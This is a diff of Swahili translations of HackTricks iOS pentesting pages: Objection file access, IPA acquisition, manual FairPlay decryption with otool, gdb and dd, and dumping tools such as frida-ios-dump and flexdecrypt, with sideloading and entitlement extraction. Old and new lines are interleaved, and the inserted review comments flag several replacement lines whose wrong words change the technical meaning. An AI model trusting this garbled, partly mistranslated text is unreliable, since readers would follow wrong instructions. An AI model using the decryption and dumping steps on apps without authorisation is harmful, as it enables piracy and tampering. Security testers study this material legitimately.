**Kutumia iFunbox na iExplorer:** Zana hizi za GUI ni muhimu kwa kusimamia faili kwenye vifaa vya iOS. Hata hivyo, kuanzia iOS 8.4, Apple imezuia upatikanaji wa zana hizi kwenye sanduku la maombi isipokuwa kifaa kimefungwa.
**Kutumia iFunbox na iExplorer:** Zana hizi za GUI ni muhimu kwa usimamizi wa faili kwenye vifaa vya iOS. Hata hivyo, kuanzia iOS 8.4, Apple ilipunguza ufikiaji wa zana hizi kwenye sandbox ya programu isipokuwa kifaa kimefanywa jailbroken.
### **Kutumia Objection kwa Usimamizi wa Faili**
**Kifaa cha Shell cha Kuingiliana na Objection:** Kuzindua objection hutoa upatikanaji kwenye saraka ya Bundle ya programu. Kutoka hapa, unaweza kusafiri kwenye saraka ya Nyaraka ya programu na kusimamia faili, ikiwa ni pamoja na kupakua na kupakia kutoka kwenye kifaa cha iOS.
**Shell ya Kihusiano na Objection:** Kuanzisha objection kunatoa ufikiaji wa saraka ya Bundle ya programu. Kutoka hapa, unaweza kuhamasisha kwenye saraka ya Hati za programu na kusimamia faili, ikiwa ni pamoja na kupakua na kupakia faili hizo kutoka na kwenda kwenye kifaa cha iOS.
```bash
objection --gadget com.apple.mobilesafari explorer
cd /var/mobile/Containers/Data/Application/72C7AAFB-1D75-4FBA-9D83-D8B4A2D44133/Documents
file download <filename>
```
## **Kupata na Kuchanganua Programu**
## **Kupata na Kutolewa kwa Programu**
### **Kupata Faili ya IPA**
### **Kupata Faili la IPA**
**Kiungo cha Usambazaji wa Juu ya Hewani (OTA):** Programu zilizosambazwa kwa ajili ya majaribio kupitia OTA zinaweza kupakuliwa kwa kutumia zana ya kupakua mali ya huduma za ITMS, ambayo imewekwa kupitia npm na hutumiwa kuokoa faili ya IPA kwa kiwango cha ndani.
**Kiungo cha Usambazaji Juu ya Hewa (OTA):** Programu zinazotolewa kwa ajili ya majaribio kupitia OTA zinaweza kupakuliwa kwa kutumia chombo cha kupakua mali za huduma za ITMS, ambacho kimewekwa kupitia npm na kinatumika kuhifadhi faili la IPA kwenye kifaa.
```bash
npm install -g itms-services
itms-services -u "itms-services://?action=download-manifest&url=https://s3-ap-southeast-1.amazonaws.com/test-uat/manifest.plist" -o - > out.ipa
```
### **Kuchukua Programu ya Binary**
### **Kutoa Binary ya App**
1. **Kutoka kwa IPA:** Fungua IPA ili kupata programu ya binary iliyofunguliwa.
2. **Kutoka kwa Kifaa kilichovunjwa:** Sakinisha programu na chukua binary iliyofunguliwa kutoka kumbukumbu.
1. **Kutoka kwa IPA:** Fungua IPA ili kufikia binary ya app iliyotolewa.
2. **Kutoka kwa Kifaa kilichovunjwa:** Sakinisha app na toa binary iliyotolewa kutoka kwenye kumbukumbu.
### **Mchakato wa Kufungua**
**Muhtasari wa Kufungua kwa Mikono:** Programu za iOS zinafungwa kwa kutumia FairPlay na Apple. Ili kurejesha, mtu lazima achukue binary iliyofunguliwa kutoka kumbukumbu. Mchakato wa kufungua unahusisha kuchunguza bendera ya PIE, kurekebisha bendera za kumbukumbu, kutambua sehemu iliyofungwa, na kisha kuchukua na kubadilisha sehemu hii na fomu yake iliyofunguliwa.
**Muhtasari wa Kufungua kwa Mikono:** Binary za app za iOS zimefungwa na Apple kwa kutumia FairPlay. Ili kufanya reverse-engineering, lazima utoe binary iliyotolewa kutoka kwenye kumbukumbu. Mchakato wa kufungua unajumuisha kuangalia bendera ya PIE, kurekebisha bendera za kumbukumbu, kubaini sehemu iliyofungwa, na kisha kutoa na kubadilisha sehemu hii na fomu yake iliyotolewa.
**Kuchunguza na Kubadilisha Bendera ya PIE:**
**Kuangalia na Kubadilisha Bendera ya PIE:**
```bash
otool -Vh Original_App
python change_macho_flags.py --no-pie Original_App
otool -Vh Hello_World
```
**Kutambua Sehemu Iliyofichwa na Kudondosha Kumbukumbu:**
**Kutambua Sehemu Iliyosimbwa na Kutupa Kumbukumbu:**
Tambua anwani za kuanza na kumaliza sehemu iliyofichwa kwa kutumia `otool` na kudondosha kumbukumbu kutoka kifaa kilichovunjwa ulinzi kwa kutumia gdb.
Tathmini anwani za mwanzo na mwisho za sehemu iliyosimbwa kwa kutumia `otool` na utupe kumbukumbu kutoka kwa kifaa kilichovunjwa kwa kutumia gdb.
```bash
otool -l Original_App | grep -A 4 LC_ENCRYPTION_INFO
dump memory dump.bin 0x8000 0x10a4000
```
**Kuandika upya Sehemu Iliyofichwa:**
**Kufuta Sehemu Iliyoandikwa kwa Siri:**
Badilisha sehemu iliyoifichwa katika faili ya asili ya programu na nakala iliyofichuliwa.
Badilisha sehemu iliyokuwa imeandikwa kwa siri katika programu asilia na dump iliyotolewa.
```bash
dd bs=1 seek=<starting_address> conv=notrunc if=dump.bin of=Original_App
```
**Kukamilisha Ufichuzi:** Badilisha metadata ya faili ya binary ili kuonyesha kutokuwepo kwa ufichuzi kwa kutumia zana kama **MachOView**, kwa kuweka `cryptid` kuwa 0.
**Kumaliza Kufichua:** Badilisha metadata ya binary ili kuonyesha kutokuwepo kwa usimbuaji kwa kutumia zana kama **MachOView**, ukipanga `cryptid` kuwa 0.
### **Ufichuzi (Kiotomatiki)**
### **Kufichua (Kiotomatiki)**
#### **frida-ios-dump**
Zana ya [**frida-ios-dump**](https://github.com/AloneMonkey/frida-ios-dump) hutumiwa kwa **ufichuzi na uchimbaji wa kiotomatiki wa programu** kutoka kwenye vifaa vya iOS. Kwanza, mtu lazima aconfigure `dump.py` ili kuunganisha kifaa cha iOS, ambacho kinaweza kufanywa kupitia localhost kwenye bandari 2222 kupitia **iproxy** au moja kwa moja kupitia anwani ya IP ya kifaa na bandari.
Zana ya [**frida-ios-dump**](https://github.com/AloneMonkey/frida-ios-dump) inatumika kwa **kufichua na kutoa programu kiotomatiki** kutoka kwa vifaa vya iOS. Kwanza, mtu anapaswa kuunda `dump.py` kuungana na kifaa cha iOS, ambayo inaweza kufanywa kupitia localhost kwenye bandari 2222 kupitia **iproxy** au moja kwa moja kupitia anwani ya IP ya kifaa na bandari.
Programu zilizosakinishwa kwenye kifaa zinaweza kuorodheshwa kwa kutumia amri:
Programu zilizowekwa kwenye kifaa zinaweza kuorodheshwa kwa amri:
```bash
$ python dump.py -l
```
Kutapanya programu maalum, kama vile Telegram, tumia amri ifuatayo:
Ili kudump programu maalum, kama Telegram, amri ifuatayo inatumika:
```bash
$ python3 dump.py -u "root" -p "<PASSWORD>" ph.telegra.Telegraph
```
Amri hii inaanzisha upakuaji wa programu, ikisababisha uundaji wa faili ya `Telegram.ipa` katika saraka ya sasa. Mchakato huu ni mzuri kwa vifaa vilivyofungwa, kwani programu zisizo na saini au zilizosainiwa bandia zinaweza kusakinishwa tena kwa kutumia zana kama [**ios-deploy**](https://github.com/ios-control/ios-deploy).
Hii amri inaanzisha upakuaji wa programu, na kusababisha kuundwa kwa faili ya `Telegram.ipa` katika saraka ya sasa. Mchakato huu unafaa kwa vifaa vilivyovunjwa, kwani programu zisizosainiwa au zisizo sahihi zinaweza kufungwa upya kwa kutumia zana kama [**ios-deploy**](https://github.com/ios-control/ios-deploy).
#### **flexdecrypt**
Zana ya [**flexdecrypt**](https://github.com/JohnCoates/flexdecrypt), pamoja na kifuniko chake [**flexdump**](https://gist.github.com/defparam/71d67ee738341559c35c684d659d40ac), inaruhusu uchimbaji wa faili za IPA kutoka kwenye programu zilizosakinishwa. Amri za usakinishaji kwa **flexdecrypt** kwenye kifaa ni pamoja na kupakua na kusakinisha pakiti ya `.deb`. **flexdump** inaweza kutumika kuorodhesha na kudump programu, kama inavyoonyeshwa katika amri zifuatazo:
Zana ya [**flexdecrypt**](https://github.com/JohnCoates/flexdecrypt), pamoja na kifungashio chake [**flexdump**](https://gist.github.com/defparam/71d67ee738341559c35c684d659d40ac), inaruhusu kutoa faili za IPA kutoka kwa programu zilizowekwa. Amri za usakinishaji za **flexdecrypt** kwenye kifaa zinajumuisha kupakua na kusakinisha kifurushi cha `.deb`. **flexdump** inaweza kutumika kuorodhesha na kupakua programu, kama inavyoonyeshwa katika amri zilizo hapa chini:
```bash
apt install zip unzip
wget https://gist.githubusercontent.com/defparam/71d67ee738341559c35c684d659d40ac/raw/30c7612262f1faf7871ba8e32fbe29c0f3ef9e27/flexdump -P /usr/local/bin; chmod +x /usr/local/bin/flexdump
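Review bot: several replacement lines change the technical meaning rather than just the wording. "Decrypted" is rendered as "iliyotolewa" (extracted, given) in `Fungua IPA ili kufikia binary ya app iliyotolewa`, in `toa binary iliyotolewa kutoka kwenye kumbukumbu` and in the manual-decryption overview, which blurs the difference between pulling a binary out of the IPA and dumping the FairPlay-decrypted image from memory; "iliyosimbuliwa" (decrypted) keeps the distinction the paragraph depends on. The heading `**Kufuta Sehemu Iliyoandikwa kwa Siri:**` says "delete the encrypted section", but the `dd ... conv=notrunc` line below it overwrites that section in place, so the removed "Kuandika upya" (overwrite) was correct. "Uhamasishaji"/"kuhamasisha" (mobilisation, raising awareness) is used for data extraction in `## **Mbinu za Uhamasishaji wa Data**`, in the `tar`/`scp` paragraph and in the Objection paragraph; "uchimbaji" or "kuhamisha" (extract, transfer) is what those sentences mean. Smaller points: `kwa kukimbia` (by sprinting) for "by running" before the `iproxy` block should be "kwa kuendesha"; `kuhifadhi faili la IPA kwenye kifaa` says the IPA is saved on the device, whereas the `itms-services ... > out.ipa` command saves it locally; and in the frida-ios-dump paragraph `zisizo sahihi zinaweza kufungwa upya` should say fake-signed apps can be reinstalled ("zenye sahihi bandia zinaweza kusakinishwa upya"), since "kufungwa upya" means re-closed.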
@ -141,33 +142,33 @@ flexdump list
flexdump dump Twitter.app
```
#### **bagbak**
[**bagbak**](https://github.com/ChiChou/bagbak), chombo kingine kinachotegemea Frida, kinahitaji kifaa kilichofungwa kwa ajili ya kufichua programu:
[**bagbak**](https://github.com/ChiChou/bagbak), chombo kingine kinachotumia Frida, kinahitaji kifaa kilichovunjwa ili kufungua programu:
```bash
bagbak --raw Chrome
```
#### **r2flutch**
**r2flutch**, ikitumia radare na frida, inatumika kwa kusimbua na kudumpa programu. Maelezo zaidi yanaweza kupatikana kwenye [**ukurasa wake wa GitHub**](https://github.com/as0ler/r2flutch).
**r2flutch**, ikitumia radare na frida, inatumika kwa ajili ya ufichuzi wa programu na dumping. Taarifa zaidi zinaweza kupatikana kwenye [**GitHub page**](https://github.com/as0ler/r2flutch).
### **Kuweka Programu**
**Sideloading** inahusu kuweka programu nje ya Duka rasmi la App. Mchakato huu unashughulikiwa na **installd daemon** na inahitaji programu kuwa na saini ya cheti kilichotolewa na Apple. Vifaa vilivyofanyiwa jailbreak vinaweza kuepuka hii kupitia **AppSync**, kuruhusu kuweka pakiti za IPA zenye saini bandia.
**Sideloading** inamaanisha kufunga programu nje ya Duka rasmi la Programu. Mchakato huu unashughulikiwa na **installd daemon** na unahitaji programu zisainiwe kwa cheti kilichotolewa na Apple. Vifaa vilivyofanywa jailbroken vinaweza kupita hili kupitia **AppSync**, kuruhusu ufungaji wa pakiti za IPA zenye sahihi bandia.
#### **Vyombo vya Sideloading**
#### **Zana za Sideloading**
- **Cydia Impactor**: Chombo cha kusaini na kuweka faili za IPA kwenye iOS na faili za APK kwenye Android. Mwongozo na suluhisho la matatizo yanaweza kupatikana kwenye [yalujailbreak.net](https://yalujailbreak.net/how-to-use-cydia-impactor/).
- **Cydia Impactor**: Zana ya kusaini na kufunga faili za IPA kwenye iOS na faili za APK kwenye Android. Miongozo na ufumbuzi wa matatizo yanaweza kupatikana kwenye [yalujailbreak.net](https://yalujailbreak.net/how-to-use-cydia-impactor/).
- **libimobiledevice**: Maktaba kwa Linux na macOS kwa mawasiliano na vifaa vya iOS. Amri za kuweka na mifano ya matumizi ya ideviceinstaller zinapatikana kwa kuweka programu kupitia USB.
- **libimobiledevice**: Maktaba kwa ajili ya Linux na macOS kuwasiliana na vifaa vya iOS. Amri za ufungaji na mifano ya matumizi ya ideviceinstaller zinatolewa kwa ajili ya kufunga programu kupitia USB.
- **ipainstaller**: Chombo cha amri kinachoruhusu kuweka programu moja kwa moja kwenye vifaa vya iOS.
- **ipainstaller**: Zana hii ya mstari wa amri inaruhusu ufungaji wa moja kwa moja wa programu kwenye vifaa vya iOS.
- **ios-deploy**: Kwa watumiaji wa macOS, ios-deploy inaweka programu za iOS kupitia amri ya mstari wa peruzi. Kufungua faili ya IPA na kutumia bendera ya `-m` kwa uzinduzi wa moja kwa moja wa programu ni sehemu ya mchakato.
- **ios-deploy**: Kwa watumiaji wa macOS, ios-deploy inafunga programu za iOS kutoka kwenye mstari wa amri. Kufungua IPA na kutumia lipo `-m` kwa ajili ya uzinduzi wa moja kwa moja wa programu ni sehemu ya mchakato.
- **Xcode**: Tumia Xcode kuweka programu kwa kwenda kwenye **Window/Devices and Simulators** na kuongeza programu kwenye **Installed Apps**.
- **Xcode**: Tumia Xcode kufunga programu kwa kuingia kwenye **Window/Devices and Simulators** na kuongeza programu kwenye **Installed Apps**.
#### **Ruhusu Kuweka Programu kwenye Vifaa Visivyo vya iPad**
Ili kuweka programu maalum za iPad kwenye vifaa vya iPhone au iPod touch, thamani ya **UIDeviceFamily** kwenye faili ya **Info.plist** inahitaji kubadilishwa kuwa **1**. Mabadiliko haya, hata hivyo, yanahitaji kusaini upya faili ya IPA kutokana na ukaguzi wa uthibitisho wa saini.
#### **Ruhusu Ufunguzi wa Programu kwenye Vifaa Visivyo vya iPad**
Ili kufunga programu maalum za iPad kwenye vifaa vya iPhone au iPod touch, thamani ya **UIDeviceFamily** katika faili ya **Info.plist** inahitaji kubadilishwa kuwa **1**. Marekebisho haya, hata hivyo, yanahitaji kusaini tena faili ya IPA kutokana na ukaguzi wa uthibitisho wa sahihi.
**Note**: Njia hii inaweza kushindwa ikiwa programu inahitaji uwezo maalum unaopatikana kwenye mifano mipya ya iPad wakati inatumia iPhone au iPod touch ya zamani.
**Kumbuka**: Njia hii inaweza kushindwa ikiwa programu inahitaji uwezo wa kipekee kwa mifano mipya ya iPad wakati ikitumia iPhone au iPod touch ya zamani.
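Review bot: the ios-deploy bullet now reads `Kufungua IPA na kutumia lipo \`-m\``, which turns the `-m` flag into a reference to `lipo`, the macOS fat-binary tool, and will send readers looking for a lipo option that does not exist in this context; the removed line's "bendera ya `-m`" (the `-m` flag) was right. Also `#### **Ruhusu Ufunguzi wa Programu kwenye Vifaa Visivyo vya iPad**` says "opening" apps, while the paragraph under it is about installing iPad-only apps on iPhone/iPod touch by changing `UIDeviceFamily`, so "Usakinishaji" (installation) as in the removed heading is the accurate word. In the bagbak line, `ili kufungua programu` (to open the app) should say "kusimbua" (decrypt), matching the tool's purpose stated in the same sentence.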
@ -178,16 +179,17 @@ Ili kuweka programu maalum za iPad kwenye vifaa vya iPhone au iPod touch, thaman
* [https://mas.owasp.org/MASTG/techniques/ios/MASTG-TECH-0054/](https://mas.owasp.org/MASTG/techniques/ios/MASTG-TECH-0054/)
* [https://mas.owasp.org/MASTG/techniques/ios/MASTG-TECH-0056/](https://mas.owasp.org/MASTG/techniques/ios/MASTG-TECH-0056/)
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi wa PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au **kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}

View file

@ -1,31 +1,32 @@
# Kuchimbua Haki za Matumizi kutoka kwa Programu Iliyokompiliwa
# Extracting Entitlements from Compiled Application
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi wa PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
Muhtasari wa ukurasa [https://mas.owasp.org/MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0069/#review-entitlements-embedded-in-the-compiled-app-binary](https://mas.owasp.org/MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0069/#review-entitlements-embedded-in-the-compiled-app-binary)
### **Kuchimbua Haki za Matumizi na Faili za Uthibitisho wa Simu**
### **Extracting Entitlements and Mobile Provision Files**
Wakati unashughulika na IPA ya programu au programu iliyosanikishwa kwenye kifaa kilichovunjwa, huenda usiweze kupata faili za `.entitlements` au faili ya `embedded.mobileprovision` moja kwa moja. Walakini, orodha za haki za matumizi bado zinaweza kuchimbwa kutoka kwa programu iliyokompiliwa, kwa kufuata taratibu zilizoainishwa katika sura ya "Uchunguzi wa Usalama wa Msingi wa iOS", haswa sehemu ya "Kupata Programu Iliyokompiliwa".
Wakati wa kushughulikia IPA ya programu au programu iliyosanikishwa kwenye kifaa kilichovunjwa, kupata faili za `.entitlements` au faili ya `embedded.mobileprovision` moja kwa moja huenda isiwezekane. Hata hivyo, orodha za mali za entitlements bado zinaweza kutolewa kutoka kwa binary ya programu, kufuata taratibu zilizoelezwa katika sura ya "iOS Basic Security Testing", hasa sehemu ya "Acquiring the App Binary".
Hata na programu iliyofichwa, hatua fulani zinaweza kutumika kuchimbua faili hizi. Ikiwa hatua hizi zinashindwa, zana kama Clutch (ikiwa inalingana na toleo la iOS), frida-ios-dump, au zana kama hizo zinaweza kuhitajika kufuta na kuchimbua programu.
Hata na binaries zilizofichwa, hatua fulani zinaweza kutumika kutoa faili hizi. Ikiwa hatua hizi zitashindwa, zana kama Clutch (ikiwa inafaa na toleo la iOS), frida-ios-dump, au zana zinazofanana zinaweza kuhitajika kufichua na kutoa programu.
#### **Kuchimbua Plist ya Haki za Matumizi kutoka kwa Programu Iliyokompiliwa**
#### **Extracting the Entitlements Plist from the App Binary**
Ukiwa na programu iliyokompiliwa inayopatikana kwenye kompyuta, **binwalk** inaweza kutumika kuchimbua faili zote za XML. Amri ifuatayo inaonyesha jinsi ya kufanya hivyo:
Ikiwa binary ya programu inapatikana kwenye kompyuta, **binwalk** inaweza kutumika kutoa faili zote za XML. Amri hapa chini inaonyesha jinsi ya kufanya hivyo:
```bash
$ binwalk -e -y=xml ./Telegram\ X
@ -34,33 +35,34 @@ DECIMAL HEXADECIMAL DESCRIPTION
1430180 0x15D2A4 XML document, version: "1.0"
1458814 0x16427E XML document, version: "1.0"
```
Badala yake, **radare2** inaweza kutumika kwa kimya kimya kutekeleza amri na kumaliza, kutafuta maneno yote katika faili ya programu ambayo ina "PropertyList":
Mbadala, **radare2** inaweza kutumika kutekeleza amri kwa kimya na kutoka, ikitafuta nyuzi zote katika binary ya programu zinazohusisha "PropertyList":
```bash
$ r2 -qc 'izz~PropertyList' ./Telegram\ X
0x0015d2a4 ascii <?xml version="1.0" encoding="UTF-8" standalone="yes"?>...
0x0016427d ascii H<?xml version="1.0" encoding="UTF-8"?>...
```
Wote njia, binwalk na radare2, huwezesha uchimbaji wa faili za `plist`, na ukaguzi wa ya kwanza (0x0015d2a4) unaonyesha kupona kwa mafanikio ya [faili ya awali ya haki za Telegram](https://github.com/peter-iakovlev/Telegram-iOS/blob/77ee5c4dabdd6eb5f1e2ff76219edf7e18b45c00/Telegram-iOS/Telegram-iOS-AppStoreLLC.entitlements).
Mifumo yote miwili, binwalk na radare2, inaruhusu utoaji wa `plist` faili, huku ukaguzi wa wa kwanza (0x0015d2a4) ukionyesha urejeleaji wa mafanikio wa [faili ya awali ya entitlements kutoka Telegram](https://github.com/peter-iakovlev/Telegram-iOS/blob/77ee5c4dabdd6eb5f1e2ff76219edf7e18b45c00/Telegram-iOS/Telegram-iOS-AppStoreLLC.entitlements).
Kwa faili za programu zinazopatikana kwenye vifaa vilivyovunjwa (kwa mfano, kupitia SSH), amri ya **grep** na bendera ya `-a, --text` inaweza kutumika kutibu faili zote kama maandishi ya ASCII:
Kwa programu za binary zinazofikiwa kwenye vifaa vilivyovunjwa (kwa mfano, kupitia SSH), amri ya **grep** yenye lippu `-a, --text` inaweza kutumika kutibu faili zote kama maandiko ya ASCII:
```bash
$ grep -a -A 5 'PropertyList' /var/containers/Bundle/Application/...
```
Kurekebisha bendera ya `-A num, --after-context=num` inaruhusu kuonyesha mistari zaidi au chache. Njia hii ni inafaa hata kwa programu za binary zilizofichwa na imehakikiwa kwa programu kadhaa za Duka la App. Zana zilizotajwa hapo awali pia zinaweza kutumika kwenye vifaa vya iOS vilivyofungwa kwa madhumuni kama hayo.
Adjusting the `-A num, --after-context=num` flag allows for the display of more or fewer lines. Hii mbinu inapatikana hata kwa binaries za programu zilizofichwa na imethibitishwa dhidi ya programu nyingi za App Store. Zana zilizotajwa hapo awali zinaweza pia kutumika kwenye vifaa vya iOS vilivyovunjwa kwa madhumuni sawa.
**Note**: Matumizi moja kwa moja ya amri ya `strings` hayapendekeziwi kwa kazi hii kutokana na vikwazo vyake katika kupata habari muhimu. Badala yake, ni vyema kutumia grep na bendera ya `-a` kwenye binary au kutumia radare2 (`izz`)/rabin2 (`-zz`) kwa matokeo yenye ufanisi zaidi.
**Note**: Matumizi ya moja kwa moja ya amri `strings` hayapendekezwi kwa kazi hii kutokana na mipaka yake katika kupata habari muhimu. Badala yake, kutumia grep na bendera `-a` kwenye binary au kutumia radare2 (`izz`)/rabin2 (`-zz`) inashauriwa kwa matokeo bora zaidi.
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
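Review bot: the grep paragraph's replacement line leaves its first sentence untranslated ("Adjusting the `-A num, --after-context=num` flag allows for the display of more or fewer lines.") while the rest of the same line is Swahili; the removed line already had a usable rendering, "Kurekebisha bendera ya `-A num, --after-context=num` inaruhusu kuonyesha mistari zaidi au michache." Also, in the line introducing the grep command on jailbroken devices, "lippu" is not a Swahili word (it is a stray token); the same concept is rendered "bendera" two paragraphs later in the `strings` note, so use "bendera ya `-a, --text`" for consistency.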

View file

@ -1,57 +1,79 @@
# Vipengele vya Programu za iOS
# iOS App Extensions
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka mwanzo hadi kuwa bingwa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
